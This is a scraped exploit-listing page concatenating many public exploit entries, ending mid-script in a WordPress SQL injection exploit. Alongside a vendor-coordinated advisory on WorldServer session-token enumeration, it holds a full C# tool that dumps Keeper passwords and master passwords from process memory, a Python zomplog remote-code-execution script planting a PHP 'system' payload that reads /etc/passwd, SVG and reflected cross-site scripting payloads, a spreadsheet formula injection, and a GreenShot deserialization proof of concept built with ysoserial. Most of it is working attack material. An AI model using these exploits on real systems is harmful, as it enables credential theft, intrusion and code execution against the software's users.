HireHackking

Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions. Details ======= Product: WorldServer Affected Versions: 11.7.3 and earlier versions Fixed Version: 11.8.0 Vulnerability Type: Session Token Enumeration Security Risk: high Vendor URL: https://www.rws.com/localization/products/additional-solutions/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001 Advisory Status: published CVE: CVE-2023-38357 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357 Introduction ============ "WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content." (from the vendor's homepage) More Details ============ WorldServer associates user sessions with numerical tokens, which always are positive values below 2^31. The SOAP action "loginWithToken" allows for a high amount of parallel attempts to check if a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range of values. An attacker is therefore able to enumerate user accounts in only a few hours. Proof of Concept ================ In the following an example "loginWithToken" request is shown: ----------------------------------------------------------------------- POST /ws/services/WSContext HTTP/1.1 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 501 Host: www.example.com Connection: close User-Agent: agent <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org"> <soapenv:Header/> <soapenv:Body> <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <token xsi:type="xsd:string">FUZZ</token> </com:loginWithToken> </soapenv:Body> </soapenv:Envelope> ----------------------------------------------------------------------- It can be saved as file "login-soap.req" and be used as a request template for the command-line HTTP enumerator monsoon [1] to achieve many parallel requests: ----------------------------------------------------------------------- $ monsoon fuzz --threads 100 \ --template-file login-soap.req \ --range 1-2147483647 \ --hide-pattern "InvalidSessionException" \ 'https://www.example.com' Target URL: https://www.example.com/ status header body value extract 500 191 560 5829099 500 191 556 6229259 200 191 3702 7545136 500 191 556 9054984 [...] processed 12000000 HTTP requests in 2h38m38s 4 of 12000000 requests shown, 1225 req/s ----------------------------------------------------------------------- The --range parameter reflects the possible value range of 2^31 and for each value an HTTP request is sent to the WorldServer SOAP API where the FUZZ marker in the request template is replaced with the respective value. Also responses are hidden which contain "InvalidSessionException" as these sessions are invalid. Responses will yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned. Workaround ========== Lower the rate at which requests can be issued, for example with a frontend proxy. Fix === According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability. Security Risk ============= Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts using this method in under three hours. Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API [2]. Thus, the vulnerability poses a high risk. Timeline ======== 2023-03-27 Vulnerability identified 2023-03-30 Customer approved disclosure to vendor 2023-04-03 Requested security contact from vendor 2023-04-06 Vendor responded with security contact 2023-04-14 Advisory sent to vendor 2023-04-18 Vendor confirms vulnerability and states that it was already known and fixed in version 11.8.0. 2023-07-03 Customer confirms update to fixed version 2023-07-05 CVE ID requested 2023-07-15 CVE ID assigned 2023-07-19 Advisory released References ========== [1] https://github.com/RedTeamPentesting/monsoon [2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping # Google Dork: NA # Date: 22-07-2023 # Exploit Author: H4rk3nz0 # Vendor Homepage: https://www.keepersecurity.com/en_GB/ # Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html # Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4 # Tested on: Windows # CVE : CVE-2023-36266 using System; using System.Management; using System.Diagnostics; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; using System.Collections.Generic; // Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory // This can persist after logout if the user has not explicitly enabled the option to 'clear process memory' // As a result of this one can extract credentials & master password from a victim after achieving low priv access // This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app. // Github: https://github.com/H4rk3nz0/Peeper static class Program { // To make sure we are targetting the right child process - check command line public static string GetCommandLine(this Process process) { if (process is null || process.Id < 1) { return ""; } string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}"; using (var searcher = new ManagementObjectSearcher(query)) using (var collection = searcher.Get()) { var managementObject = collection.OfType<ManagementObject>().FirstOrDefault(); return managementObject != null ? (string)managementObject["CommandLine"] : ""; } } //Extract plain text credential JSON strings (regex inelegant but fast) public static void extract_credentials(string text) { int index = text.IndexOf("{\"title\":\""); int eindex = text.IndexOf("}"); while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))"); string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); int match_cut = match.IndexOf("} "); if (match_cut != -1 ) { match = match.Substring(0, match_cut + "} ".Length).TrimEnd(); if (!stringsList.Contains(match) && match.Length > 20) { Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n"); stringsList.Add(match); } } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20) { Console.WriteLine("->Credential Record Found : " + match + "\n"); stringsList.Add(match.TrimEnd()); } index = text.IndexOf("{\"title\":\"", index + 1); eindex = text.IndexOf("}", eindex + 1); } catch { return; } } } // extract account/email containing JSON string public static void extract_account(string text) { int index = text.IndexOf("{\"expiry\""); int eindex = text.IndexOf("}"); while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)"); string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); if ((match.Length > 2)) { Console.WriteLine("->Account Record Found : " + match + "\n"); return; } index = text.IndexOf("{\"expiry\"", index + 1); eindex = text.IndexOf("}", eindex + 1); } catch { return; } } } // Master password not available with SSO based logins but worth looking for. // Disregard other data key entries that seem to match: _not_master_key_example public static void extract_master(string text) { int index = text.IndexOf("data_key"); int eindex = index + 64; while (index >= 0) { try { int endIndex = Math.Min(index + eindex, text.Length); Regex reg = new Regex("(data_key[ -~]+)"); var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})"); if (match_one.Replace("data_key", "").Length > 5) { if (!clean.IsMatch(match_one.Replace("data_key", ""))) { Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n"); } } index = text.IndexOf("data_key", index + 1); eindex = index + 64; } catch { return; } } } // Store extracted strings and comapre public static List<string> stringsList = new List<string>(); // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8 // Performs OpenProcess to get handle with necessary query permissions static void Main(string[] args) { foreach (var process in Process.GetProcessesByName("keeperpasswordmanager")) { string commandline = GetCommandLine(process); if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7")) { Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString()); Console.WriteLine("->Searching...\n"); IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id); IntPtr address = new IntPtr(0x10000000000); MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION(); while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0) { if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000) { byte[] buffer = new byte[(int)memInfo.RegionSize]; if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0) { string text = Encoding.ASCII.GetString(buffer); extract_credentials(text); extract_master(text); extract_account(text); } } address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64()); } CloseHandle(processHandle); } } } [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr hObject); [DllImport("ntdll.dll")] public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead); [DllImport("kernel32.dll", SetLastError = true)] public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength); [StructLayout(LayoutKind.Sequential)] public struct MEMORY_BASIC_INFORMATION { public IntPtr BaseAddress; public IntPtr AllocationBase; public uint AllocationProtect; public IntPtr RegionSize; public uint State; public uint Protect; public uint Type; } }

# Exploit Title: RosarioSIS 10.8.4 - CSV Injection # Google Dork:NA # Exploit Author: Ranjeet Jaiswal# # Vendor Homepage: https://www.rosariosis.org/ # Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip # Affected Version: 10.8.4 # Category: WebApps # Tested on: Windows 10 # # # 1. Vendor Description: # # RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems. # # 2. Technical Description: # # A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application with version 10.8.4 allows malicious users to execute malicious payload in csv/xls and redirect authorized user to malicious website. # # 3. Proof Of Concept: 3.1. Proof of Concept for CSV injection. # #Step to reproduce. Step1:Login in to RosarioSIS 10.8.4 Step2:Go to Periods page Step3:Add CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")"in the Title field Step4:click on Save button to save data. Step5:Go to export tab and export the data Step6:When user open download Periods.xls file.You will see redirection hyperlink. Step7:When user click on link ,User will be redirected to Attacker or malicious website. # 4. Solution: Upgrade to latest release of RosarioSIS.

Exploit Title: Perch v3.2 - Stored XSS Application: Perch Cms Version: v3.2 Bugs: XSS Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Date of found: 21.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to http://localhost/perch_v3.2/perch/core/settings/ 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)

#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE) #Application: zomplog #Version: v3.9 #Bugs: RCE #Technology: PHP #Vendor URL: http://zomp.nl/zomplog/ #Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip #Date of found: 22.07.2023 #Author: Mirabbas Ağalarov #Tested on: Linux import requests #inputs username=input('username: ') password=input('password: ') #urls login_url="http://localhost/zimplitcms/zimplit.php?action=login" payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js" rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php" poc_url="http://localhost/zimplitcms/poc.php" #login session = requests.Session() login_data=f"lang=en&username={username}&password={password}&submit=Start!" headers={ 'Cookie' : 'ZsessionLang=en', 'Content-Type' : 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36' } login_req=session.post(login_url,headers=headers,data=login_data) if login_req.status_code == 200: print('Login OK') else: print('Login promlem.') exit() #payload payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520" pheaders={ 'Content-Type' : 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36' } payload_req=session.post(payload_url,headers=pheaders,data=payload_data) #rename rename_req=session.get(rename_url) #poc poc_req=session.get(poc_url) print(poc_req.text) #youtube poc video - https://youtu.be/nn7hieGyCFs

# Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS) # Exploit Author: CraCkEr aka (skalvin) # Date: 22/07/2023 # Vendor: mooSocial # Vendor Homepage: https://moodatingscript.com/ # Software Link: https://demo.moodatingscript.com/home # Version: 1.2 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /matchmakings/question URL parameter is vulnerable to RXSS https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number= https://website/matchmakings/question[XSS]?number= Path: /friends URL parameter is vulnerable to RXSS https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model https://website/friends[XSS]/ajax_invite?mode=model Path: /friends/ajax_invite URL parameter is vulnerable to RXSS https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model https://website/friends/ajax_invite[XSS]?mode=model Path: /pages URL parameter is vulnerable to RXSS https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l Path: /users URL parameter is vulnerable to RXSS https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity https://website/user[XSS]/view/108?tab=activity Path: /users/view URL parameter is vulnerable to RXSS https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity https://website/users/view[XSS]/108?tab=activity Path: /find-a-match URL parameter is vulnerable to RXSS https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0 https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0 [XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6 [-] Done

# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS) # Google Dork: N/A # Date: 23-July-2023 # Exploit Author: Dinesh Mohanty # Vendor Homepage: https://grabaperch.com/ # Software Link: https://grabaperch.com/download # Version: v3.2 # Tested on: Windows # CVE : Requested # Description: Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionally under the create asset section. #Steps to Reproduce User needs to login into the application and needs to follow below steps: 1. Login into the application 2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/) 3. Click on "Add assets" and fill all other details (Please note not all the text fields are vulnerable to XSS as they have output encoding) 4. Create the SVG file with below contents say xss.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS"); </script> </svg> 4. In the File upload section upload the above SVG file and submit 5. Now go to above SVG directly say the file is xss.svg 6. go to svg file (http://URL/perch/resources/xss.svg) or you can view all Assets and view the image 7. One can see that we got an XSS alert.

# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) # Date: 07/2023 # Exploit Author: Andrey Stoykov # Tested on: Ubuntu 20.04 # Blog: http://msecureltd.blogspot.com XSS #1: Steps to Reproduce: 1. Browse to Bookings 2. Select All Bookings 3. Edit booking and select Promo Code 4. Enter payload TEST"><script>alert(`XSS`)</script> // HTTP POST request POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] [...] edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1 [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 205 [...] // HTTP GET request to Bookings page GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 33590 [...] [...] <label class="control-label" for="promo_code">Promo code:</label> <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder=""> </div> [...] Unrestricted File Upload #1: // SVG file contents <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg> Steps to Reproduce: 1. Browse My Account 2. Image Browse -> Upload 3. Then right click on image 4. Select Open Image in New Tab // HTTP POST request POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] [...] -----------------------------13831219578609189241212424546 Content-Disposition: form-data; name="img"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg> [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 190 [...]

Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS) Application: Zomplog Version: v3.9 Bugs: XSS Technology: PHP Vendor URL: http://zomp.nl/zomplog/ Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip Date of found: 22.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Add new page 3. Set as <img src=x onerror=alert(4)> 4. Go to menu Poc request: POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1 Host: localhost Content-Length: 11 sec-ch-ua: Accept: */* Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open Connection: close empty=empty

# Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS # Exploit Author: CraCkEr # Date: 24/07/2023 # Vendor: Hikari Software Team # Vendor Homepage: https://www.hikashop.com/ # Software Link: https://demo.hikashop.com/index.php/en/ # Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/ # Version: 4.7.4 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'from_option' is vulnerable to RXSS https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103 Path: /index.php GET parameter 'from_ctrl' is vulnerable to RXSS https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103 Path: /index.php GET parameter 'from_task' is vulnerable to RXSS https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103 Path: /index.php GET parameter 'from_itemid' is vulnerable to RXSS https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS] [XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46 [-] Done

# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution # Date: 26/07/2023 # Exploit Author: p4r4bellum # Vendor Homepage: https://getgreenshot.org # Software Link: https://getgreenshot.org/downloads/ # Version: 1.2.6.10 # Tested on: windows 10.0.19045 N/A build 19045 # CVE : CVE-2023-34634 # # GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format # A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software # On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file # will lead to arbitrary code execution # # Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw #load the payload $payload = Get-Content .\payload.bin -Encoding Byte # retrieve the length of the payload $length = $payload.Length # load the required assembly to craft a PNG file Add-Type -AssemblyName System.Drawing # the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell $filename = "$home\poc.greenshot" $bmp = new-object System.Drawing.Bitmap 250,61 $font = new-object System.Drawing.Font Consolas,24 $brushBg = [System.Drawing.Brushes]::Green $brushFg = [System.Drawing.Brushes]::Black $graphics = [System.Drawing.Graphics]::FromImage($bmp) $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) $graphics.Dispose() $bmp.Save($filename) # append the payload to the PNG file $payload | Add-Content -Path $filename -Encoding Byte -NoNewline # append the length of the payload [System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline # append the signature "Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii # launch greenshot. Calc.exe should be executed Invoke-Item $filename

# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS # Exploit Author: CraCkEr # Date: 24/07/2023 # Vendor: VirtueMart Team # Vendor Homepage: https://www.virtuemart.net/ # Software Link: https://demo.virtuemart.net/ # Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/ # Version: 4.0.12 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /product-variants GET parameter 'keyword' is vulnerable to RXSS https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925 [XSS Payload]: uk9ni"><script>alert(1)</script>a6di2 [-] Done

#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated) #Date: 29 June 2023 #Exploit Author: Okan Kurtulus #Vendor Homepage: https://octobercms.com #Version: v3.4.4 #Tested on: Ubuntu 22.04 #CVE : N/A # Proof of Concept: 1– Install the system through the website and log in with any user with file upload authority. 2– Select "Media" in the top menu. Prepare an SVG file using the payload below. 3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered. #Stored XSS Payload: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(1); </script> </svg>

#!/usr/bin/python3 # Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi # Date: 2023-07-26 # Exploit Author: Lukas Kinneberg # Github: https://github.com/lukinneberg/CVE-2023-2636 # Vendor Homepage: https://wordpress.org/plugins/an-gradebook/ # Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z # Tested on: WordPress 6.2.2 # CVE: CVE-2023-2636 from datetime import datetime import os import requests import json # User Input: target_ip = 'CHANGE_THIS' target_port = '80' username = 'hacker' password = 'hacker' banner = ''' ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| Exploit Author: Lukas Kinneberg ''' print(banner) print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # SQL-Injection (Exploit): # Generate payload for sqlmap cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') print('[*] Payload for SQL-Injection:') # Enter the URL path of the course after the target_port below exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" ' exploitcode_risk = '--level 2 --risk 2 ' exploitcode_cookie = '--cookie="' + cookie + '" ' # SQLMAP Printout print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' 